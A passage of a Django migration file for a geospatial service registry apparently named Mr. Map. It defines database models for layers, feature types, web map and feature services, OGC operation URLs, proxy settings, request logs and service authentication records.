                ('origin', models.CharField(choices=[(None, '---'), ('capabilities', 'capabilities'), ('iso metadata', 'iso metadata')], editable=False, help_text='Where the metadata record comes from.', max_length=20, verbose_name='origin')),
                ('origin_url', models.URLField(blank=True, editable=False, help_text='the url of the document where the information of this metadata record comes from', max_length=4096, null=True, verbose_name='origin url')),
                ('title', models.CharField(help_text='a short descriptive title for this metadata', max_length=1000, verbose_name='title')),
                ('abstract', models.TextField(help_text='brief summary of the content of this metadata.', null=True, verbose_name='abstract')),
                ('is_broken', models.BooleanField(default=False, editable=False, help_text='TODO', verbose_name='is broken')),
                ('is_customized', models.BooleanField(default=False, editable=False, help_text='If the metadata record is customized, this flag is True', verbose_name='is customized')),
                ('insufficient_quality', models.TextField(blank=True, help_text='TODO', null=True)),
                ('is_searchable', models.BooleanField(default=False, help_text='only searchable metadata will be returned from the search api', verbose_name='is searchable')),
                ('hits', models.IntegerField(default=0, editable=False, help_text='how many times this metadata was requested by a client', verbose_name='hits')),
                ('is_active', models.BooleanField(default=False, help_text='Used to activate/deactivate the service. If it is deactivated, you cant request the service through the Mr. Map proxy.', verbose_name='is active?')),
                ('identifier', models.CharField(editable=False, help_text='this is a string which identifies the element on the remote service.', max_length=500, null=True, verbose_name='identifier')),
                ('bbox_lat_lon', django.contrib.gis.db.models.fields.PolygonField(blank=True, editable=False, help_text='bounding box shall be supplied regardless of what CRS the map server may support, but it may be approximate if the data are not natively in geographic coordinates. The purpose of bounding box is to facilitate geographic searches without requiring coordinate transformations by the search engine.', null=True, srid=4326, verbose_name='bounding box')),
                ('describe_feature_type_document', models.TextField(help_text='the fetched content of the download describe feature type document.', null=True, verbose_name='describe feature type')),
            ],
            options={
                'verbose_name': 'feature type',
                'verbose_name_plural': 'feature types',
            },
            bases=(extras.models.HistoricalRecordMixin, models.Model),
        ),
        migrations.CreateModel(
            name='FeatureTypeConformityCheckRun',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('passed', models.BooleanField(blank=True, null=True)),
                ('report', models.TextField(blank=True, null=True)),
                ('report_type', models.TextField(choices=[('text/html', 'text/html'), ('application/json', 'application/json')])),
            ],
            options={
                'abstract': False,
            },
        ),
        migrations.CreateModel(
            name='FeatureTypeElement',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('max_occurs', models.IntegerField(default=1)),
                ('min_occurs', models.IntegerField(default=0)),
                ('name', models.CharField(max_length=255)),
                ('data_type', models.CharField(blank=True, max_length=255, null=True)),
                ('required', models.BooleanField(default=False)),
            ],
            options={
                'verbose_name': 'feature type element',
                'verbose_name_plural': 'feature type elements',
                'ordering': ['-name'],
            },
        ),
        migrations.CreateModel(
            name='HarvestResult',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('result_file', models.FileField(editable=False, max_length=1024, upload_to=registry.models.harvest.result_file_path)),
            ],
        ),
        migrations.CreateModel(
            name='HttpRequestLog',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('timestamp', models.DateTimeField()),
                ('elapsed', models.DurationField()),
                ('method', models.CharField(max_length=20)),
                ('url', models.URLField(max_length=4096)),
                ('body', models.FileField(max_length=1024, upload_to=registry.models.security.request_body_path)),
                ('headers', models.JSONField(default=dict)),
            ],
        ),
        migrations.CreateModel(
            name='HttpResponseLog',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('status_code', models.IntegerField(default=0)),
                ('reason', models.CharField(max_length=50)),
                ('elapsed', models.DurationField()),
                ('headers', models.JSONField(default=dict)),
                ('url', models.URLField(max_length=4096)),
                ('content', models.FileField(max_length=1024, upload_to=registry.models.security.response_content_path)),
            ],
        ),
        migrations.CreateModel(
            name='Keyword',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('keyword', models.CharField(db_index=True, max_length=255, unique=True)),
            ],
            options={
                'ordering': ['keyword'],
            },
        ),
        migrations.CreateModel(
            name='Layer',
            fields=[
                ('xml_backup_file', models.FileField(editable=False, help_text='the original xml as backup to restore the xml field.', upload_to=registry.models.document.xml_backup_file_path, verbose_name='xml backup')),
                ('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
                ('date_stamp', models.DateTimeField(auto_now_add=True, db_index=True, help_text='date that the metadata was created. If this is a metadata record which is parsed from remote iso metadata, the date stamp of the remote iso metadata will be used.', verbose_name='date stamp')),
                ('file_identifier', models.CharField(db_index=True, default=uuid.uuid4, editable=False, help_text='the parsed file identifier from the iso metadata xml (gmd:fileIdentifier) OR for example if it is a layer/featuretypethe uuid of the described layer/featuretype shall be used to identify the generated iso metadata xml.', max_length=1000, null=True, verbose_name='file identifier')),
                ('origin', models.CharField(choices=[(None, '---'), ('capabilities', 'capabilities'), ('iso metadata', 'iso metadata')], editable=False, help_text='Where the metadata record comes from.', max_length=20, verbose_name='origin')),
                ('origin_url', models.URLField(blank=True, editable=False, help_text='the url of the document where the information of this metadata record comes from', max_length=4096, null=True, verbose_name='origin url')),
                ('title', models.CharField(help_text='a short descriptive title for this metadata', max_length=1000, verbose_name='title')),
                ('abstract', models.TextField(help_text='brief summary of the content of this metadata.', null=True, verbose_name='abstract')),
                ('is_broken', models.BooleanField(default=False, editable=False, help_text='TODO', verbose_name='is broken')),
                ('is_customized', models.BooleanField(default=False, editable=False, help_text='If the metadata record is customized, this flag is True', verbose_name='is customized')),
                ('insufficient_quality', models.TextField(blank=True, help_text='TODO', null=True)),
                ('is_searchable', models.BooleanField(default=False, help_text='only searchable metadata will be returned from the search api', verbose_name='is searchable')),
                ('hits', models.IntegerField(default=0, editable=False, help_text='how many times this metadata was requested by a client', verbose_name='hits')),
                ('preview_image', models.ImageField(blank=True, null=True, upload_to='')),
                ('is_active', models.BooleanField(default=False, help_text='Used to activate/deactivate the service. If it is deactivated, you cant request the service through the Mr. Map proxy.', verbose_name='is active?')),
                ('identifier', models.CharField(editable=False, help_text='this is a string which identifies the element on the remote service.', max_length=500, null=True, verbose_name='identifier')),
                ('bbox_lat_lon', django.contrib.gis.db.models.fields.PolygonField(blank=True, editable=False, help_text='bounding box shall be supplied regardless of what CRS the map server may support, but it may be approximate if the data are not natively in geographic coordinates. The purpose of bounding box is to facilitate geographic searches without requiring coordinate transformations by the search engine.', null=True, srid=4326, verbose_name='bounding box')),
                ('is_queryable', models.BooleanField(default=False, editable=False, help_text='flag to signal if this layer provides factual information or not. Parsed from capabilities.', verbose_name='is queryable')),
                ('is_opaque', models.BooleanField(default=False, editable=False, help_text='flag to signal if this layer support transparency content or not. Parsed from capabilities.', verbose_name='is opaque')),
                ('is_cascaded', models.BooleanField(default=False, editable=False, help_text='WMS cascading allows to expose layers coming from other WMS servers as if they were local layers', verbose_name='is cascaded')),
                ('scale_min', models.FloatField(blank=True, editable=False, help_text='minimum scale for a possible request to this layer. If the request is out of the given scope, the service will response with empty transparentimages. None value means no restriction.', null=True, verbose_name='scale minimum value')),
                ('scale_max', models.FloatField(blank=True, editable=False, help_text='maximum scale for a possible request to this layer. If the request is out of the given scope, the service will response with empty transparentimages. None value means no restriction.', null=True, verbose_name='scale maximum value')),
                ('lft', models.PositiveIntegerField(editable=False)),
                ('rght', models.PositiveIntegerField(editable=False)),
                ('tree_id', models.PositiveIntegerField(db_index=True, editable=False)),
                ('level', models.PositiveIntegerField(editable=False)),
            ],
            options={
                'verbose_name': 'layer',
                'verbose_name_plural': 'layers',
            },
            bases=(extras.models.HistoricalRecordMixin, models.Model),
        ),
        migrations.CreateModel(
            name='LayerConformityCheckRun',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('passed', models.BooleanField(blank=True, null=True)),
                ('report', models.TextField(blank=True, null=True)),
                ('report_type', models.TextField(choices=[('text/html', 'text/html'), ('application/json', 'application/json')])),
            ],
            options={
                'abstract': False,
            },
        ),
        migrations.CreateModel(
            name='LegendUrl',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('legend_url', models.URLField(editable=False, help_text='contains the location of an image of a map legend appropriate to the enclosing Style.', max_length=4096)),
                ('height', models.IntegerField(editable=False, help_text='the size of the image in pixels')),
                ('width', models.IntegerField(editable=False, help_text='the size of the image in pixels')),
            ],
        ),
        migrations.CreateModel(
            name='Licence',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=255)),
                ('identifier', models.CharField(max_length=255, unique=True)),
                ('symbol_url', models.URLField(null=True)),
                ('description', models.TextField()),
                ('description_url', models.URLField(null=True)),
                ('is_open_data', models.BooleanField(default=False)),
            ],
        ),
        migrations.CreateModel(
            name='MapContext',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(help_text='a short descriptive title for this map context', max_length=1000, verbose_name='title')),
                ('abstract', models.TextField(help_text='brief summary of the topic of this map context', null=True, verbose_name='abstract')),
            ],
        ),
        migrations.CreateModel(
            name='MapContextLayer',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(help_text='an identifying name for this map context layer', max_length=1000, verbose_name='name')),
                ('title', models.CharField(blank=True, help_text='a short descriptive title for this map context layer', max_length=1000, null=True, verbose_name='title')),
                ('layer_scale_min', models.FloatField(blank=True, help_text='minimum scale for a possible request to this layer. If the request is out of the given scope, the service will response with empty transparentimages. None value means no restriction.', null=True, verbose_name='scale minimum value')),
                ('layer_scale_max', models.FloatField(blank=True, help_text='maximum scale for a possible request to this layer. If the request is out of the given scope, the service will response with empty transparentimages. None value means no restriction.', null=True, verbose_name='scale maximum value')),
                ('preview_image', models.ImageField(blank=True, help_text='A preview image for the Map Context Layer', null=True, upload_to=registry.models.mapcontext.preview_image_file_path, verbose_name='preview image')),
                ('lft', models.PositiveIntegerField(editable=False)),
                ('rght', models.PositiveIntegerField(editable=False)),
                ('tree_id', models.PositiveIntegerField(db_index=True, editable=False)),
                ('level', models.PositiveIntegerField(editable=False)),
            ],
            options={
                'abstract': False,
            },
        ),
        migrations.CreateModel(
            name='MetadataContact',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(default='', help_text='The name of the organization', max_length=256, verbose_name='Name')),
                ('person_name', models.CharField(default='', max_length=200, verbose_name='Contact person')),
                ('email', models.EmailField(default='', max_length=100, verbose_name='E-Mail')),
                ('phone', models.CharField(default='', max_length=100, verbose_name='Phone')),
                ('facsimile', models.CharField(default='', max_length=100, verbose_name='Facsimile')),
                ('city', models.CharField(default='', max_length=100, verbose_name='City')),
                ('postal_code', models.CharField(default='', max_length=100, verbose_name='Postal code')),
                ('address_type', models.CharField(default='', max_length=100, verbose_name='Address type')),
                ('address', models.CharField(default='', max_length=100, verbose_name='Address')),
                ('state_or_province', models.CharField(default='', max_length=100, verbose_name='State or province')),
                ('country', models.CharField(default='', max_length=100, verbose_name='Country')),
            ],
            options={
                'ordering': ['name'],
            },
        ),
migrations.CreateModel(
name='MimeType',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('mime_type', models.CharField(db_index=True, help_text='The Internet Media Type', max_length=500, unique=True, verbose_name='mime type')),
],
),
migrations.CreateModel(
name='OGCOperation',
fields=[
('operation', models.CharField(choices=[(None, '---'), ('GetCapabilities', 'GetCapabilities'), ('GetMap', 'GetMap'), ('GetFeatureInfo', 'GetFeatureInfo'), ('DescribeLayer', 'DescribeLayer'), ('GetLegendGraphic', 'GetLegendGraphic'), ('GetStyles', 'GetStyles'), ('PutStyles', 'PutStyles'), ('GetFeature', 'GetFeature'), ('Transaction', 'Transaction'), ('LockFeature', 'LockFeature'), ('DescribeFeatureType', 'DescribeFeatureType'), ('GetFeatureWithLock', 'GetFeatureWithLock'), ('GetGmlObject', 'GetGmlObject'), ('ListStoredQueries', 'ListStoredQueries'), ('GetPropertyValue', 'GetPropertyValue'), ('DescribeStoredQueries', 'DescribeStoredQueries'), ('GetRecords', 'GetRecords'), ('DescribeRecord', 'DescribeRecord'), ('GetRecordById', 'GetRecordById')], max_length=30, primary_key=True, serialize=False)),
],
),
migrations.CreateModel(
name='ProxySetting',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('camouflage', models.BooleanField(default=False, help_text='if true, all related xml documents are secured by replacing all hostnames/internet addresses of the related service with the hostname of the current Mr. Map instance.', verbose_name='camouflage')),
('log_response', models.BooleanField(default=False, help_text='if true, all responses of the related service will be logged.', verbose_name='log response')),
],
),
migrations.CreateModel(
name='ReferenceSystem',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('code', models.CharField(max_length=100)),
('prefix', models.CharField(choices=[(None, '---'), ('EPSG', 'EPSG')], default='EPSG', max_length=255)),
],
options={
'ordering': ['-code'],
},
),
migrations.CreateModel(
name='Rule',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=1000)),
('field_name', models.TextField(choices=[('title', 'title'), ('abstract', 'abstract'), ('access_constraints', 'access_constraints'), ('keywords', 'keywords'), ('formats', 'formats'), ('reference_system', 'reference_system')])),
('property', models.TextField(choices=[('len', 'len'), ('count', 'count')])),
('operator', models.TextField(choices=[('>', '>'), ('>=', '>='), ('<', '<'), ('<=', '<='), ('==', '=='), ('!=', '!=')])),
('threshold', models.TextField(null=True)),
],
),
migrations.CreateModel(
name='ServiceAccessGroup',
fields=[
('group_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='auth.group')),
('description', models.CharField(help_text='a short description of what this group is for.', max_length=512, verbose_name='description')),
],
bases=('auth.group',),
managers=[
('objects', django.contrib.auth.models.GroupManager()),
],
),
migrations.CreateModel(
name='WebFeatureService',
fields=[
('xml_backup_file', models.FileField(editable=False, help_text='the original xml as backup to restore the xml field.', upload_to=registry.models.document.xml_backup_file_path, verbose_name='xml backup')),
('access_constraints', models.TextField(blank=True, help_text='access constraints for the given resource.', null=True, verbose_name='access constraints')),
('fees', models.TextField(blank=True, help_text='Costs and terms of use for the given resource.', null=True, verbose_name='fees')),
('use_limitation', models.TextField(blank=True, null=True)),
('license_source_note', models.TextField(blank=True, null=True)),
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('date_stamp', models.DateTimeField(auto_now_add=True, db_index=True, help_text='date that the metadata was created. If this is a metadata record which is parsed from remote iso metadata, the date stamp of the remote iso metadata will be used.', verbose_name='date stamp')),
('file_identifier', models.CharField(db_index=True, default=uuid.uuid4, editable=False, help_text='the parsed file identifier from the iso metadata xml (gmd:fileIdentifier) OR, for example, if it is a layer/featuretype, the uuid of the described layer/featuretype shall be used to identify the generated iso metadata xml.', max_length=1000, null=True, verbose_name='file identifier')),
('origin', models.CharField(choices=[(None, '---'), ('capabilities', 'capabilities'), ('iso metadata', 'iso metadata')], editable=False, help_text='Where the metadata record comes from.', max_length=20, verbose_name='origin')),
('origin_url', models.URLField(blank=True, editable=False, help_text='the url of the document where the information of this metadata record comes from', max_length=4096, null=True, verbose_name='origin url')),
('title', models.CharField(help_text='a short descriptive title for this metadata', max_length=1000, verbose_name='title')),
('abstract', models.TextField(help_text='brief summary of the content of this metadata.', null=True, verbose_name='abstract')),
('is_broken', models.BooleanField(default=False, editable=False, help_text='TODO', verbose_name='is broken')),
('is_customized', models.BooleanField(default=False, editable=False, help_text='If the metadata record is customized, this flag is True', verbose_name='is customized')),
('insufficient_quality', models.TextField(blank=True, help_text='TODO', null=True)),
('is_searchable', models.BooleanField(default=False, help_text='only searchable metadata will be returned from the search api', verbose_name='is searchable')),
('hits', models.IntegerField(default=0, editable=False, help_text='how many times this metadata was requested by a client', verbose_name='hits')),
('is_active', models.BooleanField(default=False, help_text="Used to activate/deactivate the service. If it is deactivated, you can't request the service through the Mr. Map proxy.", verbose_name='is active?')),
('version', models.CharField(choices=[(None, '---'), ('1.0.0', '1.0.0'), ('1.1.0', '1.1.0'), ('1.1.1', '1.1.1'), ('1.3.0', '1.3.0'), ('2.0.0', '2.0.0'), ('2.0.2', '2.0.2')], editable=False, help_text='the version of the service type as semantic version', max_length=10, verbose_name='version')),
('service_url', models.URLField(editable=False, help_text='the base url of the service', max_length=4096, verbose_name='url')),
('get_capabilities_url', models.URLField(help_text='the capabilities url of the ogc service', max_length=4096, validators=[MrMap.validators.validate_get_capablities_uri], verbose_name='get capabilities url')),
('keywords', models.ManyToManyField(help_text='all keywords which are related to the content of this metadata.', related_name='webfeatureservice_metadata', related_query_name='webfeatureservice_metadata', to='registry.Keyword', verbose_name='keywords')),
('licence', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.RESTRICT, to='registry.licence')),
('metadata_contact', models.ForeignKey(help_text='This is the contact for the metadata information.', on_delete=django.db.models.deletion.RESTRICT, related_name='metadata_contact_webfeatureservice_metadata', to='registry.metadatacontact', verbose_name='metadata contact')),
('service_contact', models.ForeignKey(help_text='This is the contact for the service provider.', on_delete=django.db.models.deletion.RESTRICT, related_name='service_contact_webfeatureservice_metadata', to='registry.metadatacontact', verbose_name='service contact')),
],
options={
'verbose_name': 'web feature service',
'verbose_name_plural': 'web feature services',
},
bases=(extras.models.HistoricalRecordMixin, models.Model),
),
migrations.CreateModel(
name='WebMapService',
fields=[
('xml_backup_file', models.FileField(editable=False, help_text='the original xml as backup to restore the xml field.', upload_to=registry.models.document.xml_backup_file_path, verbose_name='xml backup')),
('access_constraints', models.TextField(blank=True, help_text='access constraints for the given resource.', null=True, verbose_name='access constraints')),
('fees', models.TextField(blank=True, help_text='Costs and terms of use for the given resource.', null=True, verbose_name='fees')),
('use_limitation', models.TextField(blank=True, null=True)),
('license_source_note', models.TextField(blank=True, null=True)),
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('date_stamp', models.DateTimeField(auto_now_add=True, db_index=True, help_text='date that the metadata was created. If this is a metadata record which is parsed from remote iso metadata, the date stamp of the remote iso metadata will be used.', verbose_name='date stamp')),
('file_identifier', models.CharField(db_index=True, default=uuid.uuid4, editable=False, help_text='the parsed file identifier from the iso metadata xml (gmd:fileIdentifier) OR, for example, if it is a layer/featuretype, the uuid of the described layer/featuretype shall be used to identify the generated iso metadata xml.', max_length=1000, null=True, verbose_name='file identifier')),
('origin', models.CharField(choices=[(None, '---'), ('capabilities', 'capabilities'), ('iso metadata', 'iso metadata')], editable=False, help_text='Where the metadata record comes from.', max_length=20, verbose_name='origin')),
('origin_url', models.URLField(blank=True, editable=False, help_text='the url of the document where the information of this metadata record comes from', max_length=4096, null=True, verbose_name='origin url')),
('title', models.CharField(help_text='a short descriptive title for this metadata', max_length=1000, verbose_name='title')),
('abstract', models.TextField(help_text='brief summary of the content of this metadata.', null=True, verbose_name='abstract')),
('is_broken', models.BooleanField(default=False, editable=False, help_text='TODO', verbose_name='is broken')),
('is_customized', models.BooleanField(default=False, editable=False, help_text='If the metadata record is customized, this flag is True', verbose_name='is customized')),
('insufficient_quality', models.TextField(blank=True, help_text='TODO', null=True)),
('is_searchable', models.BooleanField(default=False, help_text='only searchable metadata will be returned from the search api', verbose_name='is searchable')),
('hits', models.IntegerField(default=0, editable=False, help_text='how many times this metadata was requested by a client', verbose_name='hits')),
('is_active', models.BooleanField(default=False, help_text="Used to activate/deactivate the service. If it is deactivated, you can't request the service through the Mr. Map proxy.", verbose_name='is active?')),
('version', models.CharField(choices=[(None, '---'), ('1.0.0', '1.0.0'), ('1.1.0', '1.1.0'), ('1.1.1', '1.1.1'), ('1.3.0', '1.3.0'), ('2.0.0', '2.0.0'), ('2.0.2', '2.0.2')], editable=False, help_text='the version of the service type as semantic version', max_length=10, verbose_name='version')),
('service_url', models.URLField(editable=False, help_text='the base url of the service', max_length=4096, verbose_name='url')),
('get_capabilities_url', models.URLField(help_text='the capabilities url of the ogc service', max_length=4096, validators=[MrMap.validators.validate_get_capablities_uri], verbose_name='get capabilities url')),
('keywords', models.ManyToManyField(help_text='all keywords which are related to the content of this metadata.', related_name='webmapservice_metadata', related_query_name='webmapservice_metadata', to='registry.Keyword', verbose_name='keywords')),
('licence', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.RESTRICT, to='registry.licence')),
('metadata_contact', models.ForeignKey(help_text='This is the contact for the metadata information.', on_delete=django.db.models.deletion.RESTRICT, related_name='metadata_contact_webmapservice_metadata', to='registry.metadatacontact', verbose_name='metadata contact')),
('service_contact', models.ForeignKey(help_text='This is the contact for the service provider.', on_delete=django.db.models.deletion.RESTRICT, related_name='service_contact_webmapservice_metadata', to='registry.metadatacontact', verbose_name='service contact')),
],
options={
'verbose_name': 'web map service',
'verbose_name_plural': 'web map services',
},
bases=(extras.models.HistoricalRecordMixin, models.Model),
),
migrations.CreateModel(
name='ConformityCheckConfigurationExternal',
fields=[
('conformitycheckconfiguration_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='registry.conformitycheckconfiguration')),
('external_url', models.URLField(max_length=1000, null=True)),
('parameter_map', models.JSONField()),
('polling_interval_seconds', models.IntegerField(blank=True, default=5)),
('polling_interval_seconds_max', models.IntegerField(blank=True, default=300)),
],
bases=('registry.conformitycheckconfiguration',),
),
migrations.CreateModel(
name='ConformityCheckConfigurationInternal',
fields=[
('conformitycheckconfiguration_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='registry.conformitycheckconfiguration')),
],
bases=('registry.conformitycheckconfiguration',),
),
migrations.CreateModel(
name='WmsConformityCheckRun',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('passed', models.BooleanField(blank=True, null=True)),
('report', models.TextField(blank=True, null=True)),
('report_type', models.TextField(choices=[('text/html', 'text/html'), ('application/json', 'application/json')])),
('config', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='registry.conformitycheckconfiguration')),
('service', models.ForeignKey(help_text='the service targeted by this check', on_delete=django.db.models.deletion.CASCADE, to='registry.webmapservice', verbose_name='service')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='WebMapServiceRemoteMetadata',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('link', models.URLField(help_text='the url where the metadata could be downloaded from.', max_length=4094, verbose_name='download link')),
('remote_content', models.TextField(help_text='the fetched content of the download url.', null=True, verbose_name='remote content')),
('object_id', models.UUIDField(help_text='the uuid of the described service, layer or feature type', verbose_name='described resource')),
('content_type', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='contenttypes.contenttype')),
('service', models.ForeignKey(help_text='the service this remote metadata is related to. This remote metadata was found in the GetCapabilities document of the related service.', on_delete=django.db.models.deletion.CASCADE, related_name='remote_metadata', related_query_name='remote_metadata', to='registry.webmapservice', verbose_name='web map service')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='WebMapServiceOperationUrl',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('method', models.CharField(choices=[(None, '---'), ('Get', 'Get'), ('Post', 'Post')], help_text='the http method that can be used for this url', max_length=10, verbose_name='http method')),
('url', models.URLField(editable=False, help_text='the url for this operation', max_length=4096, verbose_name='url')),
('operation', models.CharField(choices=[(None, '---'), ('GetCapabilities', 'GetCapabilities'), ('GetMap', 'GetMap'), ('GetFeatureInfo', 'GetFeatureInfo'), ('DescribeLayer', 'DescribeLayer'), ('GetLegendGraphic', 'GetLegendGraphic'), ('GetStyles', 'GetStyles'), ('PutStyles', 'PutStyles'), ('GetFeature', 'GetFeature'), ('Transaction', 'Transaction'), ('LockFeature', 'LockFeature'), ('DescribeFeatureType', 'DescribeFeatureType'), ('GetFeatureWithLock', 'GetFeatureWithLock'), ('GetGmlObject', 'GetGmlObject'), ('ListStoredQueries', 'ListStoredQueries'), ('GetPropertyValue', 'GetPropertyValue'), ('DescribeStoredQueries', 'DescribeStoredQueries'), ('GetRecords', 'GetRecords'), ('DescribeRecord', 'DescribeRecord'), ('GetRecordById', 'GetRecordById')], editable=False, help_text='the operation you can perform with this url.', max_length=30, verbose_name='operation')),
('mime_types', models.ManyToManyField(blank=True, editable=False, help_text='all available mime types of the remote url', related_name='webmapserviceoperationurl_operation_urls', related_query_name='webmapserviceoperationurl_operation_url', to='registry.MimeType', verbose_name='internet mime type')),
('service', models.ForeignKey(editable=False, help_text='the web map service that this url can be used for.', on_delete=django.db.models.deletion.CASCADE, related_name='operation_urls', related_query_name='operation_url', to='registry.webmapservice', verbose_name='related web map service')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='WebMapServiceAuthentication',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('username', models.CharField(help_text='the username used for the authentication.', max_length=255, verbose_name='username')),
('password', models.CharField(help_text='the password used for the authentication.', max_length=500, verbose_name='password')),
('auth_type', models.CharField(choices=[(None, '---'), ('http_basic', 'http_basic'), ('http_digest', 'http_digest')], help_text='the kind of authentication mechanism that shall be used.', max_length=100, verbose_name='authentication type')),
('key_file', models.FileField(editable=False, max_length=1024, upload_to=registry.models.security.key_file_path)),
('service', models.OneToOneField(blank=True, help_text='the optional authentication type and credentials to request the service.', null=True, on_delete=django.db.models.deletion.CASCADE, related_name='auth', related_query_name='auth', to='registry.webmapservice', verbose_name='web map service')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='WebFeatureServiceRemoteMetadata',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('link', models.URLField(help_text='the url where the metadata could be downloaded from.', max_length=4094, verbose_name='download link')),
('remote_content', models.TextField(help_text='the fetched content of the download url.', null=True, verbose_name='remote content')),
('object_id', models.UUIDField(help_text='the uuid of the described service, layer or feature type', verbose_name='described resource')),
('content_type', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='contenttypes.contenttype')),
('service', models.ForeignKey(help_text='the service this remote metadata is related to. This remote metadata was found in the GetCapabilities document of the related service.', on_delete=django.db.models.deletion.CASCADE, related_name='remote_metadata', related_query_name='remote_metadata', to='registry.webfeatureservice', verbose_name='web feature service')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='WebFeatureServiceOperationUrl',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('method', models.CharField(choices=[(None, '---'), ('Get', 'Get'), ('Post', 'Post')], help_text='the http method that can be used for this url', max_length=10, verbose_name='http method')),
('url', models.URLField(editable=False, help_text='the url for this operation', max_length=4096, verbose_name='url')),
('operation', models.CharField(choices=[(None, '---'), ('GetCapabilities', 'GetCapabilities'), ('GetMap', 'GetMap'), ('GetFeatureInfo', 'GetFeatureInfo'), ('DescribeLayer', 'DescribeLayer'), ('GetLegendGraphic', 'GetLegendGraphic'), ('GetStyles', 'GetStyles'), ('PutStyles', 'PutStyles'), ('GetFeature', 'GetFeature'), ('Transaction', 'Transaction'), ('LockFeature', 'LockFeature'), ('DescribeFeatureType', 'DescribeFeatureType'), ('GetFeatureWithLock', 'GetFeatureWithLock'), ('GetGmlObject', 'GetGmlObject'), ('ListStoredQueries', 'ListStoredQueries'), ('GetPropertyValue', 'GetPropertyValue'), ('DescribeStoredQueries', 'DescribeStoredQueries'), ('GetRecords', 'GetRecords'), ('DescribeRecord', 'DescribeRecord'), ('GetRecordById', 'GetRecordById')], editable=False, help_text='the operation you can perform with this url.', max_length=30, verbose_name='operation')),
('mime_types', models.ManyToManyField(blank=True, editable=False, help_text='all available mime types of the remote url', related_name='webfeatureserviceoperationurl_operation_urls', related_query_name='webfeatureserviceoperationurl_operation_url', to='registry.MimeType', verbose_name='internet mime type')),
('service', models.ForeignKey(editable=False, help_text='the web feature service that this url can be used for.', on_delete=django.db.models.deletion.CASCADE, related_name='operation_urls', related_query_name='operation_url', to='registry.webfeatureservice', verbose_name='related web feature service')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='WebFeatureServiceAuthentication',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('username', models.CharField(help_text='the username used for the authentication.', max_length=255, verbose_name='username')),
('password', models.CharField(help_text='the password used for the authentication.', max_length=500, verbose_name='password')),
('auth_type', models.CharField(choices=[(None, '---'), ('http_basic', 'http_basic'), ('http_digest', 'http_digest')], help_text='the kind of authentication mechanism that shall be used.', max_length=100, verbose_name='authentication type')),
('key_file', models.FileField(editable=False, max_length=1024, upload_to=registry.models.security.key_file_path)),
('service', models.OneToOneField(blank=True, help_text='the optional authentication type and credentials to request the service.', null=True, on_delete=django.db.models.deletion.CASCADE, related_name='auth', related_query_name='auth', to='registry.webfeatureservice', verbose_name='web feature service')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='TimeExtent',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('start', models.DateTimeField()),
('stop', models.DateTimeField()),
('resolution', models.DurationField(null=True)),
('dimension', models.ForeignKey(help_text='the related dimension where this interval was found.', on_delete=django.db.models.deletion.CASCADE, related_name='time_extents', related_query_name='time_extent', to='registry.dimension', verbose_name='related dimension')),
],
),
